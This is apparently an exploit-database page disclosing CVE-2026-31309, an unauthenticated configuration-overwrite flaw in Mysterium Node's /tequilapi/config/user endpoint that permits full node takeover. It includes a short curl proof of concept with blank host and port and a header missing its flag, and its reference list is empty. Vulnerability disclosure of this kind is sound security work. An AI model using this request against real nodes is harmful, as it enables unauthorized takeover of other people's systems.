Share
## https://sploitus.com/exploit?id=38A488BE-68E1-5A61-84FD-BDBEABF7FD17
# CVE-2026-31309: Broken Access Control in Mysterium Node before version 1.36.0

Improper authorization in the `/tequilapi/config/user` endpoint of Mysterium Node before `v1.36.0` allows unauthenticated attackers to arbitrarily overwrite the node's configuration and achieve a full node takeover via supplying a crafted POST request.

## PoC

```bash
curl -X POST \
    "Content-Type: application/json" \
    -d @config.json \
    http://:/tequilapi/config/user
```

Discovered by Till Schacht.

## References

- 
-